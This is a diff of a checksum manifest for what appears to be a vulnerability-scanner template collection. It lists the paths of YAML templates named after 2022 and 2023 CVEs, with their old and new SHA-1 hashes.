+http/cves/2022/CVE-2022-34046.yaml:4a512e4db920f734fbd96aba2df599b4ef631baa +http/cves/2022/CVE-2022-34047.yaml:dad4c506c36493c70ceeaf4dc484f00f4f84d2a3 +http/cves/2022/CVE-2022-34048.yaml:739453c8e719c3ccfa7552a96dda80d85752bca1 +http/cves/2022/CVE-2022-34049.yaml:d727455be9f784f77b72b49b444927323e2a1634 http/cves/2022/CVE-2022-34093.yaml:507d9374130389cd1aec5b58c6adb274020e93c7 http/cves/2022/CVE-2022-34094.yaml:532360cc425c43471f60b0c3a4668b2b416ba392 http/cves/2022/CVE-2022-34121.yaml:dbea363aeb740fe3e7119e4e1fdb4a7c39c07d28 -http/cves/2022/CVE-2022-34328.yaml:a5d85d3ab567ff7a3e9655bd9d6b44e092cef3cd -http/cves/2022/CVE-2022-34534.yaml:9ffb8d48988fbf1da5a24e59db586356c05d2c9b -http/cves/2022/CVE-2022-34576.yaml:db01443ddd5a7c1b440322296c27ac967ec933df -http/cves/2022/CVE-2022-34590.yaml:7a0875c8654b9a36c7413f9bf3ad346b61a54768 -http/cves/2022/CVE-2022-34753.yaml:cf011c53e92f1275ab9d2c1c85b785a390fb2818 +http/cves/2022/CVE-2022-34328.yaml:e5fe55725c21f813cdeaa60333bfb7460d14468b +http/cves/2022/CVE-2022-34534.yaml:5125f4291925c374f6090cdac712ac1c6195e2fe +http/cves/2022/CVE-2022-34576.yaml:33a2c61f9ebcafb39eff3aee45b50fb41b823d90 +http/cves/2022/CVE-2022-34590.yaml:0bf19820c8498fa9ccc5faa61dc810597332542a +http/cves/2022/CVE-2022-34753.yaml:289ecf60add9ae7a411994000b70c265d5c3132a http/cves/2022/CVE-2022-3484.yaml:9b14f907cb7136b5784b38fcad2ea5ad3616ad6b -http/cves/2022/CVE-2022-3506.yaml:c968d447575bfbedfda9e2f946c6dc742a462ee6 -http/cves/2022/CVE-2022-35151.yaml:887e860fc56183fc61067c95044b5e7055923da8 -http/cves/2022/CVE-2022-35405.yaml:531fd8bf67592d3550a1864d87077aa2ad8fc4ba -http/cves/2022/CVE-2022-35413.yaml:501c7edd88e20ff8a06e984985bdf7f9c6f9c563 +http/cves/2022/CVE-2022-3506.yaml:eefe91eddcc3d58c5707abde390d7ed3f7163ef1 +http/cves/2022/CVE-2022-35151.yaml:ef3efa5526ba9e67aad1b3cecaffe0bf7ff7c750 +http/cves/2022/CVE-2022-35405.yaml:fbf604e6c0fe24c0f30b6890c63cbf2b69a1e379 +http/cves/2022/CVE-2022-35413.yaml:55e6ea2f986fe75cf76b28219c9b3d03ae6bb233 http/cves/2022/CVE-2022-35416.yaml:ba270b48da401279206d5f902bbe73ca36541510 -http/cves/2022/CVE-2022-35493.yaml:59a026d68d4e4a47059411ae316a3f86e40b327e -http/cves/2022/CVE-2022-35653.yaml:1c2ca95a997adc6ad03fc86ab31180791c6ab73c +http/cves/2022/CVE-2022-35493.yaml:378f8cf705e26cad6e1d2f1664c9e81f0f053ffb +http/cves/2022/CVE-2022-35653.yaml:bee4c663f69f76c7276be665e89a9047f827730f http/cves/2022/CVE-2022-3578.yaml:cf4906cde10fe488bbdf473de15bb5d018745939 -http/cves/2022/CVE-2022-35914.yaml:8c28134bca5d19eb6f662e8e531c4c947ff45566 -http/cves/2022/CVE-2022-36446.yaml:6e1d76fbfcebd3e106413ecf687578e9f8bde35c -http/cves/2022/CVE-2022-36537.yaml:16dd909076b3f680cb78079cf81b7ca85f53da70 -http/cves/2022/CVE-2022-36553.yaml:fcc3832cae8fb321679d07f7603451fa2788385f -http/cves/2022/CVE-2022-36642.yaml:49c37d9a02606258196ed9883fa3b9096c9b25dc +http/cves/2022/CVE-2022-35914.yaml:6de43368ac4c9311cb180aeef0eaa6143355d8fd +http/cves/2022/CVE-2022-36446.yaml:b7633b4bf4718b6000edfd9e9e52715b55d6ce7f +http/cves/2022/CVE-2022-36537.yaml:d39094e117f3ced058490e36a49c92a5c0345f16 +http/cves/2022/CVE-2022-36553.yaml:e062fd460c656b568847a5e48e98da1d12482850 +http/cves/2022/CVE-2022-36642.yaml:059728c51bf05320c5efec19764a98aff3fd4866 http/cves/2022/CVE-2022-36804.yaml:f5b29c0c01d220a9aa152ff0f0146ef72e129f53 -http/cves/2022/CVE-2022-36883.yaml:b2a77fd8caa9f90f4c624d08e79da36785fb5887 -http/cves/2022/CVE-2022-37042.yaml:791bb09d5a41f5aa2c4efe95fff894066aca3462 -http/cves/2022/CVE-2022-37153.yaml:6b0c65ec090898e9e7bda7a1196d0b501c27964d +http/cves/2022/CVE-2022-36883.yaml:5b50fe6072d5b625e52e0dcba248ce68b94a3c62 +http/cves/2022/CVE-2022-37042.yaml:aea26b50f98d971c4cd697f432aa1db21abda9e0 +http/cves/2022/CVE-2022-37153.yaml:c4b038395093bd1377bcb195e8cef12ad272cdc7 http/cves/2022/CVE-2022-37190.yaml:a299ef58e490ff88c6c34e29fc02f2de7c2f2ef2 -http/cves/2022/CVE-2022-37191.yaml:a977ea067bf64e1d421824777088a50fd310eb2e +http/cves/2022/CVE-2022-37191.yaml:28c6f350050f91f878eb4677c5a54f1fa9fba6d9 http/cves/2022/CVE-2022-37299.yaml:0a3f30c80ce167733cb1a4432f2090d7d8715a62 http/cves/2022/CVE-2022-3768.yaml:8c9f9736507f827359a08f4f70e83cfa05cd3e2a -http/cves/2022/CVE-2022-3800.yaml:e0db40aab2e6f85e641c8544d490df6d1813bfb4 -http/cves/2022/CVE-2022-38131.yaml:a2476b8544baebdef4439506564eaf03eca7884b -http/cves/2022/CVE-2022-38295.yaml:5d2b719b844945457583a57848120fce85b5ddee -http/cves/2022/CVE-2022-38296.yaml:ddedd4e313db9c5b34f247104057fd75cf21c627 -http/cves/2022/CVE-2022-38463.yaml:37e1212dbe6b70efe91849adc5e90e4be74e3805 -http/cves/2022/CVE-2022-38467.yaml:62f2d8f8084e77210d887d32f244205e1a886cb9 -http/cves/2022/CVE-2022-38553.yaml:ae779d7df75f2a7703ecec46e819829c4780c74b -http/cves/2022/CVE-2022-38637.yaml:b5ea9fe5fa60aced3abbfeb0e50c2fb33a3990d1 +http/cves/2022/CVE-2022-3800.yaml:952d94e1198a767a19d3a11474b0e4ac6de8c572 +http/cves/2022/CVE-2022-38131.yaml:8c5444063337def0da743cdb0bed77c431a19ced +http/cves/2022/CVE-2022-38295.yaml:9334bfbe2358d14708f7938ca0eb811c6e265bfd +http/cves/2022/CVE-2022-38296.yaml:f45209b0c373d5e1aa7a2b88fd2fad70c34d9bd6 +http/cves/2022/CVE-2022-38463.yaml:02bcaaa35f0666a69fe3c0660084bd23d492f6ed +http/cves/2022/CVE-2022-38467.yaml:d9154780963b6c660dd351baac367f903cd17368 +http/cves/2022/CVE-2022-38553.yaml:529fecbe264713124ecc2279528c18771b774f5d +http/cves/2022/CVE-2022-38637.yaml:89ac02b50a62e40cec492ce52b97c86dc11eb887 http/cves/2022/CVE-2022-38794.yaml:d5a7bc3e97c053bc014490f0dc3b18ce3939ed76 -http/cves/2022/CVE-2022-38817.yaml:a615d76fcd6f59a22d54293bd19562985c487026 -http/cves/2022/CVE-2022-38870.yaml:d5e4359641ea70850fada0c1d9596efd31ff62b1 -http/cves/2022/CVE-2022-39048.yaml:a627a172e29e44bad133e80ab808ed890f26a19b +http/cves/2022/CVE-2022-38817.yaml:c3658089c55341de4458c362e91ba43ff9404da4 +http/cves/2022/CVE-2022-38870.yaml:34b92486761edaa35c5c1acc31fc8bc51a25f5cf +http/cves/2022/CVE-2022-39048.yaml:e5ea0c23e54edcef95895bb8f216020d6793b368 http/cves/2022/CVE-2022-3908.yaml:7a24ebd5708610556552ab3053544addd76e9dc2 -http/cves/2022/CVE-2022-39195.yaml:5badb0ee8d4fdda61ac34dcf50f40092827b780f +http/cves/2022/CVE-2022-39195.yaml:d2428cdef029d2bfbb25b35961f2d99581000266 http/cves/2022/CVE-2022-3933.yaml:8bdf9fc2cc672a6ceeadc95a0bb890ab17396398 http/cves/2022/CVE-2022-3934.yaml:e1abcd7b986d2f3622f65200fdc1412374c8f640 -http/cves/2022/CVE-2022-3980.yaml:2a7ecbba1ee977e8974dcc4872c6d7daa077985d +http/cves/2022/CVE-2022-3980.yaml:fe377c4ec20264a5590c2ba8a02eb6e916da0d40 http/cves/2022/CVE-2022-3982.yaml:e8d1d3ef09716ea6385568e088d5bf7ff4c30d20 -http/cves/2022/CVE-2022-39952.yaml:886c42b5541d8bbb8bf8c5113d5c3fe1331be474 -http/cves/2022/CVE-2022-39960.yaml:0d2ff48c23b513f8c92bd8374b41807b1e548554 +http/cves/2022/CVE-2022-39952.yaml:219ec3aa4592c668225fd5fc51067e024ec98019 +http/cves/2022/CVE-2022-39960.yaml:dcd604f037a1411311b34f19da294ec703b62600 http/cves/2022/CVE-2022-39986.yaml:92d7db86d01d2771b7880f9c440feb8e62b94de2 http/cves/2022/CVE-2022-40022.yaml:64a838eb51b5a1c34c5b17e74f1fe233cbcc24ae http/cves/2022/CVE-2022-40032.yaml:457b3c849fc450b8c4f39efc48b93f39e9a2c9ab -http/cves/2022/CVE-2022-40047.yaml:ae1d693bafef5fe46f998a3dca6021f16b8b7833 +http/cves/2022/CVE-2022-40047.yaml:9c4e99c90d7c7b6c2c98971d55c8607c20833f78 http/cves/2022/CVE-2022-40083.yaml:333acecbc6c71ec844ded8fbdc5e2de95af9e34e -http/cves/2022/CVE-2022-40127.yaml:7629ce4bfdabd4f587efa6108c0bf0d3a6f90b6f +http/cves/2022/CVE-2022-40127.yaml:82fdc6e122cfa42a321bf0bfa625ce65d44c7e14 http/cves/2022/CVE-2022-40359.yaml:ddd501f8d916d909938c17ccf6492dc2e2c7d812 -http/cves/2022/CVE-2022-4049.yaml:69e08fcb933099640d793cff650f72473cdae4eb +http/cves/2022/CVE-2022-4049.yaml:ab8b78a75bead4b89b00ae11c6f7e0a6d53e519d http/cves/2022/CVE-2022-4050.yaml:054b17311703abba376a3fceb0279ec9e86bbb01 -http/cves/2022/CVE-2022-4057.yaml:10e0f9a0f2c81b1f8ba34fdd2fa479fcc3fa0577 -http/cves/2022/CVE-2022-4059.yaml:dfacf3331d559806f98130753a29fc6a863d4a60 +http/cves/2022/CVE-2022-4057.yaml:ad0a36b5b6846b84a9a4352c367212b956c24702 +http/cves/2022/CVE-2022-4059.yaml:ea49e9ac12bd91bab3398d52f2ee319003dc1949 http/cves/2022/CVE-2022-4060.yaml:4564f0fd4f8ed6221de40ce6673f81c2c9453e8c http/cves/2022/CVE-2022-4063.yaml:4fc58e6992b32c1e2e2a0d1c78934dfb336aa6d5 http/cves/2022/CVE-2022-40684.yaml:9f201c8f2b14b43cff542ef33691c0622eabc992 -http/cves/2022/CVE-2022-40734.yaml:ccad4bac3a8ab0cc3fa07a8503314f1ff26bc6d8 +http/cves/2022/CVE-2022-40734.yaml:bfccbbb52f8c591d5b9da8e28dee81b69a08e950 http/cves/2022/CVE-2022-40843.yaml:6b26b625e95244fe922bfcf60035ca2c72221ce2 -http/cves/2022/CVE-2022-40879.yaml:b28804532d9b383aee4ff98424de408031249e29 -http/cves/2022/CVE-2022-40881.yaml:e0bfd8cce9dd9cced9b8d11c715f7d196967bd29 +http/cves/2022/CVE-2022-40879.yaml:5be8840f1f78b0c6b6e793bd74f811b4a503aac5 +http/cves/2022/CVE-2022-40881.yaml:3351fb5b6cce43fc92f7fc29cda1823c858406ef http/cves/2022/CVE-2022-4117.yaml:fe7d6f31f507cea2d5488b3e8b113b5ee72aac31 http/cves/2022/CVE-2022-4140.yaml:f243423772b8b2e9cfb6a9a3d8e4bbbbab68b2c9 -http/cves/2022/CVE-2022-41412.yaml:ee569356cb4e8502c23ee09bd6cebf5ce577e124 -http/cves/2022/CVE-2022-41441.yaml:5afbd8f84cc2e2db07e9543cc31959bf80ee6f9f -http/cves/2022/CVE-2022-41473.yaml:03a97883fc2c3ce71c5f2f5ec2c89a0289c9c010 +http/cves/2022/CVE-2022-41412.yaml:f68d560012b845d03c1cd35499d515c23f84557b +http/cves/2022/CVE-2022-41441.yaml:33b8b30ae24fa8b4901f182ea309bf305d6e8772 +http/cves/2022/CVE-2022-41473.yaml:d5a4062f6f26adbc48baf0462bf4603fc139badf http/cves/2022/CVE-2022-41840.yaml:a55753333818330dd5ac198655530d2755a3a239 -http/cves/2022/CVE-2022-42094.yaml:d803ac73d891e956307bd35e3ecad103fcb7cf83 +http/cves/2022/CVE-2022-42094.yaml:e94ba13620cdb856263351e55446f3e94eb9f1a6 http/cves/2022/CVE-2022-42095.yaml:2a39087a4ed951945354f872a56e60599e8c0441 http/cves/2022/CVE-2022-42096.yaml:92ec793355e55f7b192e39a6e580494a01014cda -http/cves/2022/CVE-2022-42233.yaml:9a60c63c0249548ccd2d12d1636c082444bf5eda +http/cves/2022/CVE-2022-42233.yaml:bcae576684347ef4fa61cbf1fe07e58f386d17b9 http/cves/2022/CVE-2022-4260.yaml:99c2043ef60f9781825d9e38553528884a3947d9 -http/cves/2022/CVE-2022-42746.yaml:213c8cf535b441c4f99b85e20c7fd05684e971eb -http/cves/2022/CVE-2022-42747.yaml:d7a8fdd29605e46e42fd40ea58a2a87a5d9f9256 -http/cves/2022/CVE-2022-42748.yaml:a43253dce089b2de1cfd94f8e0d505113eac45e0 -http/cves/2022/CVE-2022-42749.yaml:68c9aef312a2050077d6c1b5180d3c0d496fb203 -http/cves/2022/CVE-2022-4295.yaml:cad949d5b7b025f6b9d36f57e2035f5735899dd0 +http/cves/2022/CVE-2022-42746.yaml:45371e2376ef6cefe289ca3a5df2c7099b2da6a6 +http/cves/2022/CVE-2022-42747.yaml:b7e8d8f4fd5aa795f7205614a6f48cfbce32b67c +http/cves/2022/CVE-2022-42748.yaml:0cf8b77d4212697e6e937f554aa662323d7d5e88 +http/cves/2022/CVE-2022-42749.yaml:1a52d6a2a1532be5a351f810c107d8f4e1e6521c +http/cves/2022/CVE-2022-4295.yaml:55b0525163e7a256407d5eb5b1bfd8ab008bd9bf http/cves/2022/CVE-2022-4301.yaml:2b4e767bd84ebd4a1c84368b804c469efd73bad7 -http/cves/2022/CVE-2022-43014.yaml:092f73cfbbec86864123c90772957eb66f29eed6 -http/cves/2022/CVE-2022-43015.yaml:73b346abca3deee61f7fb9d2a781e1e2d34015d3 -http/cves/2022/CVE-2022-43016.yaml:bb8a79e5b8c300e235720d7b66f3b68b254ca353 -http/cves/2022/CVE-2022-43017.yaml:5937d15b707c5206d1ad31849e75cb91caf94f25 -http/cves/2022/CVE-2022-43018.yaml:0e9736fe810ba2bf84dd65901ad8068af00e4915 -http/cves/2022/CVE-2022-4305.yaml:cde1601a9489f64d29fc3371a129f98c9ff8edd5 +http/cves/2022/CVE-2022-43014.yaml:37d2fb58d33f490535b3ae10b56b0554147a3edd +http/cves/2022/CVE-2022-43015.yaml:be34d85ee1f95cf3a2546e46125a877eb1ffe568 +http/cves/2022/CVE-2022-43016.yaml:bb64a14681afc483fd2b189114d9ab7acfe00eff +http/cves/2022/CVE-2022-43017.yaml:9fb50ff91195d8ad52066b10ec43cede2a6cbca0 +http/cves/2022/CVE-2022-43018.yaml:2577afad7de6dd76a2f57ce6c62c64f2a4859528 +http/cves/2022/CVE-2022-4305.yaml:3fdae924b0e1bb86f890aa7af9d5ffebafe40aaa http/cves/2022/CVE-2022-4306.yaml:4c3e9abf755bb6c3b6ed837fedbfef8364275064 -http/cves/2022/CVE-2022-43140.yaml:0322a3a648b2a5c3e0d18c6a4cbf30ece99b5538 +http/cves/2022/CVE-2022-43140.yaml:0b17320e6b8497c31d43fda8b38295351387d2f4 http/cves/2022/CVE-2022-43164.yaml:d3655a1cc57f43bd824bea05e8b07b6715aac620 -http/cves/2022/CVE-2022-43165.yaml:1319e504da96cb0b268c19821e014df38e11dec7 -http/cves/2022/CVE-2022-43166.yaml:50790c5c392f01e7d84c8246b90601d36df98449 +http/cves/2022/CVE-2022-43165.yaml:a82ce35edbca18a4a66a28ad31b2ad30bf0b5455 +http/cves/2022/CVE-2022-43166.yaml:5783024d04cfa0a5151fa4415df376558a43236a http/cves/2022/CVE-2022-43167.yaml:ed99223862bbeca7a59f9b256d3e83a36d888866 http/cves/2022/CVE-2022-43169.yaml:886425b04de1990ae8765ac89eeea1dc12112f4c http/cves/2022/CVE-2022-43170.yaml:9197f87eeaf16c75cffb3b4c5f81464bc925350d http/cves/2022/CVE-2022-43185.yaml:e2948f0b914fc30b8a09db4ebff35960884ef5f7 http/cves/2022/CVE-2022-4320.yaml:85df1be119e20f7dd54ec90fe4f29813ec89fc90 -http/cves/2022/CVE-2022-4321.yaml:3fd91fa933b7668fe6df56df56faa3c693bd3335 +http/cves/2022/CVE-2022-4321.yaml:fa7154c7a1774e884087d6c5d65204aafa773867 http/cves/2022/CVE-2022-4325.yaml:f186020c216cd067428f78142dc9637ac51c3ec8 http/cves/2022/CVE-2022-4328.yaml:027d49a96bd49b38b06c63fe56e85df269c0af27 -http/cves/2022/CVE-2022-43769.yaml:a2914f7437a5ebdcdd3b480f4cbe828714720081 +http/cves/2022/CVE-2022-43769.yaml:049ee24edce0e7c6b77f93ab767865f0bf7a4e30 http/cves/2022/CVE-2022-44290.yaml:c1846eb89065149403e96318b7de144c6fa807a9 http/cves/2022/CVE-2022-44291.yaml:50e4b9fef3f63a6f1166f23761c05ecea1412bbb http/cves/2022/CVE-2022-4447.yaml:9a4bef58f543b34699e05028a6b018ccf8ed7271 -http/cves/2022/CVE-2022-44877.yaml:08b523f22f7b1cb691dd675a63e09d8f722c0d69 -http/cves/2022/CVE-2022-44944.yaml:d5908b9fcca05900a02ad48941ef37bff23c09cd -http/cves/2022/CVE-2022-44946.yaml:75ae504c29405d657a0c462bdd772863e54ca270 +http/cves/2022/CVE-2022-44877.yaml:65addb2099f78a557e4d2025c0499bc45d4086c9 +http/cves/2022/CVE-2022-44944.yaml:97bb24d579fd6711c91904b7601eea135e6191d1 +http/cves/2022/CVE-2022-44946.yaml:604674f25712575a79c8e2641731bfd9cbb3fa46 http/cves/2022/CVE-2022-44947.yaml:16f643d647217ef1d75424f3fbd3d6c5ad271713 http/cves/2022/CVE-2022-44948.yaml:f415128131697bb9cb617ca11fe51e255cbb9a40 http/cves/2022/CVE-2022-44949.yaml:83a365b7ce07bcc5ecd989fb324f338a6caadca6 -http/cves/2022/CVE-2022-44950.yaml:28661f2344654dfc49fcc91ffcefdb71f063c824 +http/cves/2022/CVE-2022-44950.yaml:189ebb0f87e4daf6feb36dc271706295bf0dba13 http/cves/2022/CVE-2022-44951.yaml:549fa91cda9f41aa5044a57761109a3982e307fc http/cves/2022/CVE-2022-44952.yaml:c629ee34322ee56610296866a376746cae941860 http/cves/2022/CVE-2022-44957.yaml:097dbdc04c9ec9d0a8917061295cb399d2eb77e8 http/cves/2022/CVE-2022-45037.yaml:6abb4c091e036c9d52b7c996e0c26d9531ba8f4a http/cves/2022/CVE-2022-45038.yaml:d2503018ebb3d9883bc8ed21f43e67f15422aae5 -http/cves/2022/CVE-2022-45354.yaml:3e22708f71f7ba4436269ada83587342f40cdbf5 +http/cves/2022/CVE-2022-45354.yaml:3805cd0d0be4230b9fe827bd0b9b392098de9765 http/cves/2022/CVE-2022-45362.yaml:ade84fe7804fdef6dfb1718899ac3b1917cfc679 -http/cves/2022/CVE-2022-45365.yaml:ed3c882d31f0b9a2128e15a9f185962cd9d81f6c +http/cves/2022/CVE-2022-45365.yaml:68eac7ed59da1c278d608e1100998cb36761c39f http/cves/2022/CVE-2022-45805.yaml:a049af1b44e8af0e4df790d0ddc6396f07f0187a -http/cves/2022/CVE-2022-45835.yaml:420e435b203f5340bdfc7e43ec9407d779f6d22d -http/cves/2022/CVE-2022-45917.yaml:a912c41b103c15770638bfe8381550a6d12d1516 -http/cves/2022/CVE-2022-45933.yaml:8b1842eb7be2432f70572fd363e94545d6493573 +http/cves/2022/CVE-2022-45835.yaml:04fd898e50897154f6a405a5fd39e31ac301ce15 +http/cves/2022/CVE-2022-45917.yaml:82dbe394d156806c65243012feb0965f39f117ee +http/cves/2022/CVE-2022-45933.yaml:2f04ea871e5282032d3fd2afc55e47c7b2a576b0 http/cves/2022/CVE-2022-46020.yaml:8d67b335554da18fb41c72bdbab3aa132081c167 -http/cves/2022/CVE-2022-46071.yaml:925a37f307139ce11d93e0485f15d63771038b5f +http/cves/2022/CVE-2022-46071.yaml:af91b64580f1176cfa545a6e29d7c25336abf583 http/cves/2022/CVE-2022-46073.yaml:6a2be60284f109569a84565b31582bfb709c96e3 -http/cves/2022/CVE-2022-46169.yaml:ad399cafd666c584f57d4cd12b3c84007b048f58 -http/cves/2022/CVE-2022-46381.yaml:f774ed97b2134dc90158d838c2aa470361978e66 -http/cves/2022/CVE-2022-46443.yaml:2de7041c6bb180c94f963123ffc022ecff0d8fc2 +http/cves/2022/CVE-2022-46169.yaml:04f274527c32a4ef90910db5b14c53286f1477a4 +http/cves/2022/CVE-2022-46381.yaml:48afc500b14e4ee746c4a8f978ce67cbba12b081 +http/cves/2022/CVE-2022-46443.yaml:4cf883b55a292a82f12080098b4a322d8b48e892 http/cves/2022/CVE-2022-46463.yaml:5484def361a7ff3c709b12195a28a14089974358 -http/cves/2022/CVE-2022-46888.yaml:46952f2fbfef5907506dc04fde6cea98af3f6679 -http/cves/2022/CVE-2022-46934.yaml:331381fe839f3033cb1b3984d508a2443b104877 -http/cves/2022/CVE-2022-47002.yaml:b5f20044e9621860a3efb0b32d3856a1934827ad -http/cves/2022/CVE-2022-47003.yaml:39b0dcdde25452144702c74bddbf9842ef9c2feb +http/cves/2022/CVE-2022-46888.yaml:18f66c9c668a5eaff2bdc1f4712f9f6a90601a99 +http/cves/2022/CVE-2022-46934.yaml:269ee818b3dd27daf9a256e33ed4e37fff58a713 +http/cves/2022/CVE-2022-47002.yaml:cb63fa544598812b17868fffb5efd8be2fb14043 +http/cves/2022/CVE-2022-47003.yaml:c9a28e29afdc49e53da85d9b01a2173cd99d51fa http/cves/2022/CVE-2022-47075.yaml:c1678eb8b857134451836ce2b5f593dd7c05aff4 -http/cves/2022/CVE-2022-47501.yaml:5a057cde27d1558e1cf82a1363829f1b07e1e7d0 -http/cves/2022/CVE-2022-47615.yaml:5fd9679a2f05799098398f1c4744f03efbc98406 -http/cves/2022/CVE-2022-47945.yaml:fc6bf1988ae81ba0b7aab2866fbf36092527fb1d -http/cves/2022/CVE-2022-47966.yaml:b4f745ff224a0c1005e847548490607ccab51ae7 -http/cves/2022/CVE-2022-47986.yaml:2a8f07ea60a04d4e8917666f9f8229dc8e668b6b -http/cves/2022/CVE-2022-48012.yaml:468945001c2fda706f19335ba0fccdd41254845f +http/cves/2022/CVE-2022-47501.yaml:350942e2cc9df574404870a956e3771d49b83d21 +http/cves/2022/CVE-2022-47615.yaml:3a6f5902d3db5524ae59494e02e81d51f5da37da +http/cves/2022/CVE-2022-47945.yaml:b71d75bd35f0652a5c2e9bf29e662af4de98999e +http/cves/2022/CVE-2022-47966.yaml:eabfb8ab9027a25256d730ee541f4c9c0beacf0c +http/cves/2022/CVE-2022-47986.yaml:f13024a610a98afc8d1092c86ee01c7fad302987 +http/cves/2022/CVE-2022-48012.yaml:aa700886a377524252e6b99ba9eb4635a05f02a1 http/cves/2022/CVE-2022-48165.yaml:0d30e08a304606adecb631a940f674bfa06f8b46 -http/cves/2022/CVE-2022-48197.yaml:fcdf74df464deab4276806b2fd1d8d11e7849c36 +http/cves/2022/CVE-2022-48197.yaml:ebb8d718df47a31131c05088ffca84512e484321 http/cves/2022/CVE-2022-4897.yaml:92f778ba997e0d796420c1236682069f0b0f9779 http/cves/2023/CVE-2023-0099.yaml:cdfed327c29ff370e6b06c37aa366dab18e1165f http/cves/2023/CVE-2023-0126.yaml:6622dccea76462d0952ff1db6e35da809393d97a -http/cves/2023/CVE-2023-0159.yaml:dad65813c9a2a5d95fefa066072e4dcb30a33414 +http/cves/2023/CVE-2023-0159.yaml:e5454486ab9219d366ec7769290cd2ca4f880065 http/cves/2023/CVE-2023-0236.yaml:59baf08b76758762d47f413d236485cf5b319dce http/cves/2023/CVE-2023-0261.yaml:5087fa9d04efc600b41de02fcac82bda2bcf0595 -http/cves/2023/CVE-2023-0297.yaml:ace64d1b8ef97f2466a2718a5d62fd9bc3363962 +http/cves/2023/CVE-2023-0297.yaml:21e6813e4bf43dfeb5bff97b87278784c9486236 http/cves/2023/CVE-2023-0334.yaml:e64c269ae26b3ae9cc1018c96b7c988d1ce7d16b http/cves/2023/CVE-2023-0448.yaml:602dc4fb8805fa78abee06c6aaea0e867a814943 http/cves/2023/CVE-2023-0514.yaml:b76094833ad8697323609f0e18538edda46b4526 @@ -2890,161 +2890,161 @@ http/cves/2023/CVE-2023-0563.yaml:5826a789671414b74d945727d46e2868a0030eb9 http/cves/2023/CVE-2023-0600.yaml:fcfb1a40a3cd2e7df90c774102fd125bd335b405 http/cves/2023/CVE-2023-0602.yaml:e31c5d2abf85c2ee480612417a8d6a784ea0c190 http/cves/2023/CVE-2023-0630.yaml:3e345bf8bc629f39a8cd585c837348d7600981bf -http/cves/2023/CVE-2023-0669.yaml:b6c8c235c98d2f2bf23b28b62006591fcf62aabf -http/cves/2023/CVE-2023-0678.yaml:8c8f0e339ac17af3d2efac4b3ec82cdbbb279bb6 -http/cves/2023/CVE-2023-0777.yaml:695dc3b34a41b2d46cabcb2c40a57b3fe284f036 +http/cves/2023/CVE-2023-0669.yaml:a4f649bedb10dc2c7fbb5e3495c3ef07ba288bdb +http/cves/2023/CVE-2023-0678.yaml:e1c21272ee2775d3ccca6b29b38cef8cbc988767 +http/cves/2023/CVE-2023-0777.yaml:dba43d7f9116a72868f241bce2d1f0243054b04b http/cves/2023/CVE-2023-0900.yaml:cbef37de88d0b61540d3d8b63c80c09960b6c21e http/cves/2023/CVE-2023-0942.yaml:fcb0811220da813890a775f5c00e2f91cf2c340b -http/cves/2023/CVE-2023-0947.yaml:2d43c3e9a69df1ec17476ed2b0895fe38ede4d06 +http/cves/2023/CVE-2023-0947.yaml:f85009ff00956342fc92c472973cd76bcca3763e http/cves/2023/CVE-2023-0948.yaml:c0b92cf821b6f4b80dd5135d77ad852a8049a9bb http/cves/2023/CVE-2023-0968.yaml:0f3618d7652e69aaba867716e2bdf1217430566c http/cves/2023/CVE-2023-1020.yaml:62fc61d24e0e1681b1bf64d37033caecf096364a http/cves/2023/CVE-2023-1080.yaml:57fd2d5ede5e09e53ef5c560add050d334ba9b09 -http/cves/2023/CVE-2023-1177.yaml:3f5f39078e73040951a342c72dd0417a62d0637f +http/cves/2023/CVE-2023-1177.yaml:0253b83cf55c200bc6c8e68696350c7d29a0eb7a http/cves/2023/CVE-2023-1263.yaml:954755ea23eaab8dbf35c5b53d78ae5642ac7c11 http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 http/cves/2023/CVE-2023-1434.yaml:35cc7af9bfe87b4a88a973a22dae4cc94a23bd97 http/cves/2023/CVE-2023-1454.yaml:e0b6ba7bc52ecb2e58d67b61ca3ef3010851a0fc -http/cves/2023/CVE-2023-1496.yaml:985b6d064c077e56a9214edaa14905cde2aeae6e +http/cves/2023/CVE-2023-1496.yaml:83daed0ee1166b15eba65a2f4f0ab292c5174907 http/cves/2023/CVE-2023-1546.yaml:8c8e4f20d034c05c48d5cdd431661c5b40ef7860 -http/cves/2023/CVE-2023-1671.yaml:997286cbd7021b668c2f6510ac971fcb46b86925 -http/cves/2023/CVE-2023-1698.yaml:6fef0e18d2d0772e0781dba7a71d4d002ec40300 -http/cves/2023/CVE-2023-1719.yaml:fbe0a29e87d24ce8d3bfc97713e592b06c2de057 +http/cves/2023/CVE-2023-1671.yaml:bba8b1827470ec1c3081a95f91d5a4e5b80b016e +http/cves/2023/CVE-2023-1698.yaml:48cb080fc7d02b424b0e968164a76b1784a06998 +http/cves/2023/CVE-2023-1719.yaml:94cec242385b19249e17104f7ab893b2428f3436 http/cves/2023/CVE-2023-1730.yaml:db103227ee8d88ba94638a6b952356057f095ae2 http/cves/2023/CVE-2023-1780.yaml:621e1a9e470723487065088b68c3da0d8b403231 -http/cves/2023/CVE-2023-1835.yaml:ba80a61d4cc2d0c561efb5994071542c2a59a500 +http/cves/2023/CVE-2023-1835.yaml:1bb6f7c8a948729ec2be90f49cbe0f7c670ed660 http/cves/2023/CVE-2023-1880.yaml:00d09d7b221180a15759e6629e3279c98cd53ea5 http/cves/2023/CVE-2023-1890.yaml:3330b642e76c981f041c0275e19aa44d0f3b8bd2 -http/cves/2023/CVE-2023-1892.yaml:0628d24acbfbbd6a5079d77de9455bf90f0e091c -http/cves/2023/CVE-2023-20073.yaml:94402e66e673901266d834d82e411b71933190ef +http/cves/2023/CVE-2023-1892.yaml:536f1227d638780d831c10918d6623cc3b387591 +http/cves/2023/CVE-2023-20073.yaml:3a0abd96dcf4d3fbac43737fcb73fb69aeecf1b6 http/cves/2023/CVE-2023-2009.yaml:6680fb1da94a211cbb09a77d3b19a9b4165dc8a1 http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 http/cves/2023/CVE-2023-2023.yaml:226bf02b5318dc6cfebadd23d5aecb21c651e9c2 -http/cves/2023/CVE-2023-2059.yaml:0cca32c1ba98932cbe6b413055becd7affc69b27 -http/cves/2023/CVE-2023-20864.yaml:00440eaddd70c1fa0c48a1382e6d85d69abd7fee -http/cves/2023/CVE-2023-20887.yaml:a8fd31ef3cc60ff2572b0ef5f182862e9a064ede -http/cves/2023/CVE-2023-20888.yaml:f13a7f0b88d50776a333b40a138f82c633d125a0 